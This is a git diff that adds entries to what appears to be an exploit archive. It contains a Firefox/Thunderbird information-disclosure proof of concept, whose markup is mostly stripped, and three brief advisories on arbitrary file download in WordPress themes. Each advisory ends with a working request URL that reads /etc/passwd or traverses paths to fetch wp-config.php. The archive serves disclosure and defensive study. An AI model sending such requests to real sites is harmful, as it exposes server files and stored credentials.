diff --git a/files.csv b/files.csv index ee6da66c8..29150152c 100755 --- a/files.csv +++ b/files.csv @@ -35535,3 +35535,7 @@ id,file,description,date,author,platform,type,port 39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Vulnerability",2014-08-26,"Claudio Viviani",php,webapps,0 +39295,platforms/multiple/remote/39295.js,"Mozilla Firefox <= 9.0.1 and Thunderbird <= 3.1.20 Information Disclosure Vulnerability",2014-09-02,"Michal Zalewski",multiple,remote,0 +39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 diff --git a/platforms/multiple/remote/39295.js b/platforms/multiple/remote/39295.js new file mode 100755 index 000000000..780305a64 --- /dev/null +++ b/platforms/multiple/remote/39295.js @@ -0,0 +1,140 @@ +source: http://www.securityfocus.com/bid/69525/info + +Mozilla Firefox and Thunderbird are prone to an information-disclosure vulnerability. + +Attackers can exploit this issue to disclose sensitive information that may aid in further attacks. + +This issue is fixed in: + +Firefox 32 +Firefox ESR 31.1 +Thunderbird 31.1 + + + + + +
+
+ +
+
+ + + + +

Variants:

+ + + + + + + diff --git a/platforms/php/webapps/39296.txt b/platforms/php/webapps/39296.txt new file mode 100755 index 000000000..f7ccf5253 --- /dev/null +++ b/platforms/php/webapps/39296.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/69670/info + +Urban City theme for Wordpress is prone to an arbitrary file-download vulnerability. + +An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. + +http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/39297.txt b/platforms/php/webapps/39297.txt new file mode 100755 index 000000000..ff334e996 --- /dev/null +++ b/platforms/php/webapps/39297.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/69671/info + +Authentic theme for Wordpress is prone to an arbitrary file-download vulnerability. + +An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. + +http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39298.txt b/platforms/php/webapps/39298.txt new file mode 100755 index 000000000..7fd956bff --- /dev/null +++ b/platforms/php/webapps/39298.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/69672/info + +Epic theme for Wordpress is prone to an arbitrary file-download vulnerability. + +An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. + +http://www.example.com/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php \ No newline at end of file